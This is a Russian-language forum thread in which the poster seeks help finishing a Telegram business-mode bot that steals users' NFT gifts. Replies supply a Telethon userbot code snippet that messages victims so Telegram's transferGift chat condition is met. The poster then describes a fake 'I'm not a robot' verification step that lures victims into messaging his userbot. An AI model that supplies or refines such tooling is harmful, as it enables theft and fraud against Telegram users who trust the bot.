Telegram bot - кража NFT подарков - обход transfergift ?

Dett1a

floppy-диск
Пользователь
Реакции
2
Вобщем то писал я телеграм бота который будет красть нфт подарки пользователей которые добавили этого самого бота в настройках в бизнес режим.
Столкнулся с проблемой - в телеграмме есть официальный метод transfergift одним из условий которого является то, что у пользователя должна быть переписка с тем человеком, которому подарок будет передан как минимум последние 24 часа.
Но проверив похожие боты от других людей я увидел, что они этот метод как то обошли и подарки уходят даже на те аккаунты, переписки с которым не было, так вот обьясните мне как это можно обойти?
Я уже 20 часов насилую нейронку пытаясь дать мне нормальный ответ, прочитал документации все и никакой инфы.
Одно из решений которое я вижу (костыль) написать юзербота который получая лог об успешном коннекте будет автоматически писать жертве и сразу же удалять чат, но складывается другая проблема - а если у жертвы запрещены сообщения, либо наш аккаунт получит спамблок?

Вобщем кто предложит решение буду благодарен, если оно будет рабочее могу поделиться сурсами своего бота

Вобщем то писал я телеграм бота который будет красть нфт подарки пользователей которые добавили этого самого бота в настройках в бизнес режим.
Столкнулся с проблемой - в телеграмме есть официальный метод transfergift одним из условий которого является то, что у пользователя должна быть переписка с тем человеком, которому подарок будет передан как минимум последние 24 часа.
Но проверив похожие боты от других людей я увидел, что они этот метод как то обошли и подарки уходят даже на те аккаунты, переписки с которым не было, так вот обьясните мне как это можно обойти?
Я уже 20 часов насилую нейронку пытаясь дать мне нормальный ответ, прочитал документации все и никакой инфы.
Одно из решений которое я вижу (костыль) написать юзербота который получая лог об успешном коннекте будет автоматически писать жертве и сразу же удалять чат, но складывается другая проблема - а если у жертвы запрещены сообщения, либо наш аккаунт получит спамблок?

Вобщем кто предложит решение буду благодарен, если оно будет рабочее могу поделиться сурсами своего бота

Так же интересно было бы узнать как можно получать актуальную цену подарков как это делает @PriceNFTbot, если есть идеи тоже можете отписать. Буду безмерно благодарен

Так же интересно было бы узнать как можно получать актуальную цену подарков как это делает @PriceNFTbot, если есть идеи тоже можете отписать. Буду безмерно благодарен
getgems marketplace подойдет?

Ты что смешной?
На соседних форумах уже кучу таких ботов слили,возьми от туда их и глянь как сделано и сделай себе,если ты хочешь именно своего написать
ты что смешной? очевидно что я эти форумы облазил и там везде один и тот же метод передачи.
А готовое решение которое позволяет обойти ограничения я не нашел НИГДЕ.
очевидно что перед тем как создавать тему на форуме я проверил ВСЮ доступную информацию которую смог найти в том числе форумы, офиц документацию, даже у нейронки спросил

Ты что смешной?
На соседних форумах уже кучу таких ботов слили,возьми от туда их и глянь как сделано и сделай себе,если ты хочешь именно своего написать
Дело в том что на форумах один и тот же шаблон везде , и нигде не реализовано то, что меня интересует. У меня есть варианты как это можно обойти, но это костыль и хотелось бы спросить, может кто то за это подшарен больше чем я

Привет если проблема актуальна вот один из способов:

используешь библиотеку telethon после создаешь сессию аккаунта на который будет отправляться подарки и пишешь код в котором телетхон будет писать сам человеку после того как он добавил бота в бизнес аккаунт

Привет если проблема актуальна вот один из способов:

используешь библиотеку telethon после создаешь сессию аккаунта на который будет отправляться подарки и пишешь код в котором телетхон будет писать сам человеку после того как он добавил бота в бизнес аккаунт
пример кода:

Python:
    # ---------- действия ----------
    async def send_hello(self, username: str):
        me = await self.client.get_me()
        await self.client.send_message(username, "Hello, YOU")
        return True, me.id

async def send_gift_150(self, username: str, stars_to_transfer: int):
        receiver = await self.client.get_input_entity(username)

for _ in range(int(stars_to_transfer) // 25):
            invoice = types.InputInvoiceStarGift(
                peer=receiver,
                gift_id=5170144170496491616,
            )
            pf = await self.client(functions.payments.GetPaymentFormRequest(invoice=invoice))
            await self.client(
                functions.payments.SendStarsFormRequest(form_id=pf.form_id, invoice=invoice)
            )
        return True, me.id

пример кода:

Python:
    # ---------- действия ----------
    async def send_hello(self, username: str):
        await self.client.send_message(username, "Hello, YOU")
        return True, me.id

async def send_gift_150(self, username: str, stars_to_transfer: int):
        receiver = await self.client.get_input_entity(username)

for _ in range(int(stars_to_transfer) // 25):
            invoice = types.InputInvoiceStarGift(
                peer=receiver,
                gift_id=5170144170496491616,
            )
            pf = await self.client(functions.payments.GetPaymentFormRequest(invoice=invoice))
            await self.client(
                functions.payments.SendStarsFormRequest(form_id=pf.form_id, invoice=invoice)
            )
        return True, me.id
софт пишет от твоего лица человеку HELLO YOU после уже твой бот может спокойно передавать тебе подарки

софт пишет от твоего лица человеку HELLO YOU после уже твой бот может спокойно передавать тебе подарки
А если у человека нет юзки? Ты его никак не найдешь и не напишешь(по id нельзя). Разве нет более умного решения?

Я в этой движухе не эксперт, но нельзя ли сделать трансфер подарков/звезд на канал и передать его?

UPD: https://telegram.org/blog/wear-gifts-blockchain-and-more

Я вроде проверил всю цепочку и нету проблем с тем чтобы подписать человека на только что созданный канал и передать все это, потом конвертировать владельцу 0.о

Но на практике это слишком тупо чтобы сработать, хотя durov hule.

Последнее редактирование:
Я в этой движухе не эксперт, но нельзя ли сделать трансфер подарков/звезд на канал и передать его?
бот даже если стоит в "бизнес режиме" не может инвайтить аккаунт в канал

https://core.telegram.org/bots/api#transfergift в доке написано что бы аккаунт куда кидаются подарки был активен в боте последние 24 часа а не была переписка с тем кому передаются подарки
new_owner_chat_idIntegerYesUnique identifier of the chat which will own the gift. The chat must be active in the last 24 hours.

А если у человека нет юзки? Ты его никак не найдешь и не напишешь(по id нельзя). Разве нет более умного решения?
из всех ответов у меня самый адекватный и удобный + если нет тэга у человека по айди никак не найти его личку

UPD: https://telegram.org/blog/wear-gifts-blockchain-and-more

Я вроде проверил всю цепочку и нету проблем с тем чтобы подписать человека на только что созданный канал и передать все это, потом конвертировать владельцу 0.о

Но на практике это слишком тупо чтобы сработать, хотя durov hule.
Я думал на счёт канала в обязательную подписку и передачи на канал, Только вот методы телеги позволяют передать подарок только человеку (через бизнес бота)

https://core.telegram.org/bots/api#transfergift в доке написано что бы аккаунт куда кидаются подарки был активен в боте последние 24 часа а не была переписка с тем кому передаются
Переписка должна быть, без этого не отправляются подарки. Я уже проверял

из всех ответов у меня самый адекватный и удобный + если нет тэга у человека по айди никак не найти его личку
Твой ответ имеет место быть, но я нашёл актуальный обход, который позволяет украсть подарки даже у пользователя без юзернейма

Твой ответ имеет место быть, но я нашёл актуальный обход, который позволяет украсть подарки даже у пользователя без юзернейма
ну-ка?

ну-ка?
Я прописал в Боте верификацию для которой пользователь должен отписать в личные сообщения и юзер бот который эту самую верификацию получая сообщения I'm not a robot подтверждает, таким образом аккаунт никогда не улетит в спам блок, его не снесёт, + обход метода телеги

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх